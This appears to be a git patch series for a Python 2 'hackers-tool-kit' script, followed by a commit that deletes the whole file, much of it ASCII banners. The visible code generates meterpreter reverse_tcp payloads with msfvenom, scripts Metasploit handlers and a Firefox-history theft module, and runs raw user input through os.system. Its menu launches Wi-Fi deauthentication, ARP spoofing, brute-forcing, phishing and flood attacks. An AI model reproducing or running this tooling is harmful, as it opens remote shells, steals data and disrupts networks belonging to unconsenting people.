[y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#FOXHIS START# +#------------# +def foxhis(): + os.system('echo "sessions\n" >> foxhisses.rc') + os.system('echo "exit\n" >> foxhisses.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r foxhisses.rc') + os.system('rm -rf foxhisses.rc') + print "\n" + ses = raw_input("Session: ") + print "\nMaximum time (seconds) to wait for a response\n" + time = raw_input("Timeout: ") + os.system('echo "use firefox/gather/history\n" >> foxhis.rc') + os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) + os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) + os.system('echo "run\n" >> foxhis.rc') + os.system('msfconsole -q -r foxhis.rc') + os.system('rm -fr foxhis.rc') +#----------# +#FOXHIS END# + + +#RHAWK START# +#-----------# +def rhawk(): + os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") +#---------# +#RHAWK END# + + +#NANO START# +#----------# +def nano(): + print "opening nano in \033[93m/root/\033[0m folder" + os.system("sleep 2") + os.system("cd /root/ && nano") +#--------# +#NANO END# + + +#UPDATE HACKERS-TOOL-KIT START# +#-----------------------------# +def update(): + os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") +#---------------------------# +#UPDATE HACKERS-TOOL-KIT END# + +#COMPILE C START# +#---------------# +def compilec(): + print "filename / filepath" + r = raw_input("> ") + print "\nfilename2 / filepath2" + h = raw_input("> ") + + a = 'g++ {0} -o {1}'.format(r,h) + os.system(a) +#COMPILE C END# +#-------------# + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + if x == "foxhis": + foxhis() + if x == "rhawk": + rhawk() + if x == "nano": + nano() + if x == "update": + update() + if x == "compilec": + compilec() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From bc003b328ae2e2c3dc1bf88b37fa689b3c09b463 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 3 Jun 2019 02:16:09 +0100 Subject: [PATCH 173/214] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 8446b99..6fae203 100644 --- a/README.md +++ b/README.md @@ -56,3 +56,5 @@ this is where i will try to put the most recent updates * added a foxhis option (firefox history gather) * added the RED_HAWK tool (rhawk option) + +* added a option to compile c files (compilec option) From 352568478c8d4c7de3d4f287a2f85566c83f0533 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 28 Jun 2019 04:50:18 +0100 Subject: [PATCH 174/214] Delete htk.py --- htk.py | 3223 -------------------------------------------------------- 1 file changed, 3223 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index acae217..0000000 --- a/htk.py +++ /dev/null @@ -1,3223 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @tuf_unkn0wn -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#WARNING START# -#-------------# -from tkinter import * -win = Tk() -warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' -messageVar = Message(win, text = warn) -messageVar.config(bg='red') -messageVar.pack( ) -win.title('HTK: Warning!') -button = Button(win, text='OK', width=25, command=win.destroy) -button.pack() -win.mainloop() -#-----------# -#WARNING END# - -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """ - type ? for help -\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - type ? for help - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - - type ? for help - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - type ? for help - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """ - type ? for help\033[91m - -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - type ? for help - """.decode('utf-8') - -def mainbanner10(): - print """\033[0m - ░░░▓█▒░▒▒▒▓▓░ - ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ - ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ - ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ - ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ - ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ - ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ - ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ - ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ - ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ - ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ - ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ - ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ - ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ - ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ - ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ - ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ - ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ - ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ - ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ - ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ - ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ - ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ - ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ - ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ - ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ - ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ - ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ - ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ - ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ - ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ - ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ - ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ - ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ - ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ - ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ - ░█▓▓▓▓▓▓███████▓██▓██░ - ░██▓▓▓████████████████░░░ - ░▓▓▓▓▓███████▓█▓████████░ ░░░ - ░░░█▓█████████████████████████▓▓▓▒░░░░░░ - ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ - ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ - ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ - ░░▓█▓█▓█████████████████████████████░░ - \033[0m""".decode('utf-8') -def mainbanner11(): - print """\033[91m - ██████╗ ██████╗ ██████╗ - ██╔════╝ ██╔════╝ ██╔════╝ - ███████╗ ███████╗ ███████╗ - ██╔═══██╗██╔═══██╗██╔═══██╗ - ╚██████╔╝╚██████╔╝╚██████╔╝ - ╚═════╝ ╚═════╝ ╚═════╝ - ░░░░ ░░░░░ - ░▒███████▓▒░░ ░░░████████▓░░░ - ░▓████████████▒░░ ░░█████████████░░ - ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ - ░ ░██████▒░ ░░░░███████ ░░ - ░░███████░░ ░░██████▓░ - ░███████░░ ░▒██████▒ - ░░░░ ░░███████░░░███████▒░ ░░░ 